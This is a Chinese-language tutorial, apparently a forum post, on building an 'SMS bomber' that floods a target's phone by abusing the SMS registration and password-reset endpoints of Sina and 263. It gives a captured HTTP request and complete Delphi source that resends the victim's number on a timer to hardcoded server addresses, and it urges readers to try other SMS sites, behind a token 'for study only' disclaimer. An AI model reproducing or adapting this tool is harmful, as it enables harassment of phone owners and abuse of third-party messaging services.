利用网站短信漏洞,做自己的手机短信轰炸机
昨天晚上在水源看到有人在传播短信轰炸机,见http://expert.csdn.net/Expert/topic/1851/1851433.xml?temp=.7669336,一时心血来潮,自己也写一个把,声明:在写这篇文章之前,该篇文章只用于学习,任何用于非法骚扰别人的行为,后果自负,与本人无关,警告大家不要用于违法行为。
该软件目前主要用于对新浪短信网络,大家可以多试一下其他网站的短信服务,比如263,搜虎,雅虎,西陆,中国短信网等,目前新浪,雅虎对此已有限制,可以说短信轰炸功能已完全失效,新浪现在限制一个IP只能注册5次,除非你采用动态拨号啊,如果他们采用输入附加码验证的功能,我们就更没有好的办法了,呵呵~~~
大家先看一下在新浪网注册短信时截获的信息把~~
/cgi-bin/sms/register.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* Referer: http://sms.sina.com.cn/docs/register.html Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: sms.sina.com.cn Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: SMSLOGIN=0; USRTYPE=C
mobile=13666666666&lang=1&ad_tag=1
以上的内容我就不详细介绍了,相比大家都能看懂,请注意mobile=13666666666,这就是你要轰炸的手机号码,主机是:sms.sina.com.cn ,提交页面: /cgi-bin/sms/register.cgi HTTP/1.1 我们现在要做的就是构造Http短信包,然后利用Delphi5的ClientSocket控件发送到新浪的短信服务器的80端口即可,很简单的啊 :)
窗口控件:
一个ClientSocket控件,一个TTimer,两个文本框,一个用于输入手机号,一个输入延时,还有两个按纽。
截图如下:
原代码部分:
unit smsBomber;
interface
uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ScktComp, NMURL, StdCtrls, ComCtrls, ExtCtrls;
type TForm1 = class(TForm) url: TNMURL; ClientSocket1: TClientSocket; Label1: TLabel; Edit1: TEdit; Button1: TButton; Button2: TButton; StatusBar1: TStatusBar; Timer1: TTimer; Label2: TLabel; Edit2: TEdit; procedure Button1Click(Sender: TObject); procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket); procedure Button2Click(Sender: TObject); procedure ClientSocket1Connect(Sender: TObject; Socket: TCustomWinSocket); procedure Timer1Timer(Sender: TObject); procedure Edit1KeyPress(Sender: TObject; var Key: Char); procedure Edit2KeyPress(Sender: TObject; var Key: Char); private { Private declarations } procedure BuildHttpHeadForSina(); procedure BuildHttpHeadFor263(); public { Public declarations } end;
var Form1: TForm1;
implementation
{$R *.DFM}
procedure TForm1.Button1Click(Sender: TObject); begin if edit1.Text='''''''' then begin showmessage(''''手机号不能为空!''''); exit; end; clientsocket1.active:=true; Timer1Timer(sender); end;
procedure TForm1.ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin StatusBar1.SimpleText:=''''连接出错!''''; errorcode:=0; end;
procedure TForm1.ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket); var s:string; begin s:=socket.ReceiveText; if pos(''''成功'''',s)<>0 then begin clientsocket1.Active :=false; StatusBar1.SimpleText:=''''发送成功!''''; clientsocket1.active:=true; end else begin StatusBar1.SimpleText:=''''发送失败!''''; clientsocket1.active:=false; end; end;
procedure TForm1.Button2Click(Sender: TObject); begin Close; end;
//针对新浪网的短信轰炸,非常好用,笔者刚调试完曾对自己的手机进行过一番狂轰乱炸,效果十分明显,迫使不得不关机,不过目前已经不灵了啊 :)
procedure TForm1.BuildHttpHeadForSina; var sends,sendc:string; begin //Http头信息 sends:=''''POST /cgi-bin/sms/register.cgi HTTP/1.1''''+#13#10; sends:=sends+''''Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*''''+#13#10; sends:=sends+''''Referer: http://sms.sina.com.cn/docs/register.html''''+#13#10; sends:=sends+''''Accept-Language: zh-cn''''+#13#10; sends:=sends+''''Content-Type: application/x-www-form-urlencoded''''+#13#10; sends:=sends+''''Accept-Encoding: gzip, deflate''''+#13#10; sends:=sends+''''User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)''''+#13#10; sends:=sends+''''Host: sms.sina.com.cn''''+#13#10; sends:=sends+''''Cache-Control: no-cache''''+#13+#10; sends:=sends+''''Cookie: SMSLOGIN=0; USRTYPE=C''''+#13+#10; //发送的内容 url.inputstring:=trim(edit1.text); sendc:=''''mobile=''''+url.Encode; sendc:=sendc+''''&lang=1&ad_tag=1''''; sends:=sends+''''Content-Length: ''''+inttostr(length(sendc))+#13#10; sends:=sends+''''Connection: Keep-Alive''''+#13+#10+#13#10 +sendc; clientsocket1.Host :=''''202.108.37.148''''; clientsocket1.Port :=80; clientsocket1.Socket.SendText(sends); end;
procedure TForm1.ClientSocket1Connect(Sender: TObject; Socket: TCustomWinSocket); begin BuildHttpHeadForSina(); //对新浪短信网进行轰炸 end;
//定时发送
procedure TForm1.Timer1Timer(Sender: TObject); begin Timer1.Interval :=strtoint(trim(edit2.text)); timer1.Enabled :=true; BuildHttpHeadForSina(); end;
procedure TForm1.Edit1KeyPress(Sender: TObject; var Key: Char); begin if not (key in [''''0''''..''''9'''',#8,#13]) then begin key :=#0; end; end;
procedure TForm1.Edit2KeyPress(Sender: TObject; var Key: Char); begin if not (key in [''''0''''..''''9'''',#8,#13]) then begin key :=#0; end; end;
//这个是用于263短信网站的,目前还没试验成功
procedure TForm1.BuildHttpHeadFor263; var sends,sendc:string; begin //Http头信息 sends:=''''POST /cgi-bin/mobile/bin/user_getpass.cgi HTTP/1.1''''+#13#10; sends:=sends+''''Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*''''+#13#10; sends:=sends+''''Referer: http://sms.263.net/getpass.html''''+#13#10; sends:=sends+''''Accept-Language: zh-cn''''+#13#10; sends:=sends+''''Content-Type: application/x-www-form-urlencoded''''+#13#10; sends:=sends+''''Accept-Encoding: gzip, deflate''''+#13#10; sends:=sends+''''User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)''''+#13#10; sends:=sends+''''Host: sms.263.net''''+#13#10; sends:=sends+''''Cache-Control: no-cache''''+#13+#10; sends:=sends+''''Cookie: SMSLOGIN=0; USRTYPE=C''''+#13+#10; //发送的内容 url.inputstring:=trim(edit1.text); sendc:=''''phone=''''+url.Encode; sendc:=sendc+''''&Submit2=%C8%B7%B6%A8''''; sends:=sends+''''Content-Length: ''''+inttostr(length(sendc))+#13#10; sends:=sends+''''Connection: Keep-Alive''''+#13+#10+#13#10 +sendc; clientsocket1.Host :=''''210.78.128.62''''; clientsocket1.Port :=80; clientsocket1.Socket.SendText(sends); end;
end.
有时间大家可以多试几个手机短信网站,不过千万不要随便骚扰别人啊~~~ :)
没有相关教程
|